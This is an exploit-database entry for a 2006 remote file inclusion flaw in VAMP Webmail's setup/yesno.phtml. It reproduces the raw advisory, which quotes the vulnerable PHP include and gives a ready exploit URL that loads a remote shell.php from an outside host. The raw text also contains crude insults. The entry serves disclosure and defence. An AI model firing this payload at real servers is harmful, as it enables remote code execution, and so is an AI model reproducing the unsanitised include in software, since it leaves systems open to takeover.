header-logo
Suggest Exploit
vendor:
VAMP Webmail
by:
Drago84
7,5
CVSS
HIGH
Remote File Inclusion
94
CWE
Product Name: VAMP Webmail
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

VAMP Webmail Remote File Inclusion by ToXiC CreW

VAMP Webmail is vulnerable to a Remote File Inclusion vulnerability. The vulnerable page is yesno.phtml located in the /setup/ directory. The vulnerable code is <?if($answer=="Yes") { include $yes_url; } else { include $no_url; }?>. An attacker can exploit this vulnerability by sending a malicious URL in the no_url parameter. For example, http://www.site.com/wamp_dir/setup/yesno.phtml?no_url=http://sonic-banda-di-lamer.gay/shell.php?.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file inclusion operation.
Source

Exploit-DB raw data:

###### ToXiC #########################
#
#VAMP Webmail Remote File Inclusion by ToXiC CreW
#
#BuG FounD by Drago84
#
#Application Affect:VAMP Webmail
#
#Page:
#     yesno.phtml
#Dir :
#     /setup/
#
#Problem:
#        <?if($answer=="Yes") {
#         include $yes_url;
#         } else {
#        include $no_url;
#         }?>
# ExPloit :
#http://www.site.com/wamp_dir/setup/yesno.phtml?no_url=http://sonic-banda-di-lamer.gay/shell.php?
#
#        
GrEatZ All Member of ToXiC, Str0ke
#
#
#FUCK #Sonic
#
# ToXic Security Italian CreW
###### ToXiC ##########

# milw0rm.com [2006-09-30]

Navigation

Suggest Exploit

Services By CQR